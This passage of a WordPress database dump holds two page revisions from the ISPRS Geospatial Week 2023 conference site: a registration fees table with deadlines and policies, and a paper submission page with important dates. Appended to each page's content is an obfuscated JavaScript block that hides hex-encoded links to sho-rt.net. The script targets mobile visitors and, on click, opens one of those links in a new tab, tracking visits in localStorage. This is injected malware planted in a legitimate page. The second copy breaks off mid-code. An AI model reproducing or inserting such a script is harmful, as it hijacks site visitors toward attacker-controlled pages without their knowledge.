(4568,1,'2023-05-24 23:27:12','2023-05-24 23:27:12','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">REGISTER NOW</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span>[/bsf-info-box][vc_separator style=\"shadow\" border_width=\"8\"][vc_column_text]<strong>Registration deadlines</strong></p>\n<ul>\n<li>Early bird registration deadline: July 1, 2023</li>\n<li>Late registration deadline: July 21, 2023</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than August 2, 2023. No refunds after this date, but replacement is allowed.</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Two social dinners will be organized on Sep. 3<sup>rd</sup> and Sep. 5<sup>th</sup></strong></span></p>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-05-24 23:27:12','2023-05-24 23:27:12','',2638,'https://gsw2023.com/?p=4568',0,'revision','',0),
(4569,1,'2023-05-24 23:30:41','2023-05-24 23:30:41','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">ISPRS reviewing process</a>. <strong>Note that Full papers should be submitted anonymously</strong><strong>. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</strong></p>\n<p>&nbsp;</p>\n<p>Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\">ISPRS Archives</a>.</p>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><strong>Important Dates:</strong></p>\n<ol>\n<li><strong>Annals (Fully Reviewed Papers):</strong>\n<ul>\n<li>Full paper submission (Annals): April 30, 2023</li>\n<li>Full paper Author notification: June 15, 2023</li>\n<li>Camera ready paper submission: July 15, 2023</li>\n</ul>\n</li>\n</ol>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><strong>Archives (Abstract Reviewed Papers):</strong>\n<ul>\n<li>Abstracts submission (Archives): May 15, 2023</li>\n<li>Abstracts Author notification: June 15, 2023</li>\n<li>Camera ready paper submission: July 15, 2023</li>\n</ul>\n</li>\n</ol>\n<p>&nbsp;</p>\n<p><strong>Registration deadlines</strong></p>\n<ul>\n<li>Early bird registration deadline: July 1, 2023</li>\n<li>Late registration deadline: July 21, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 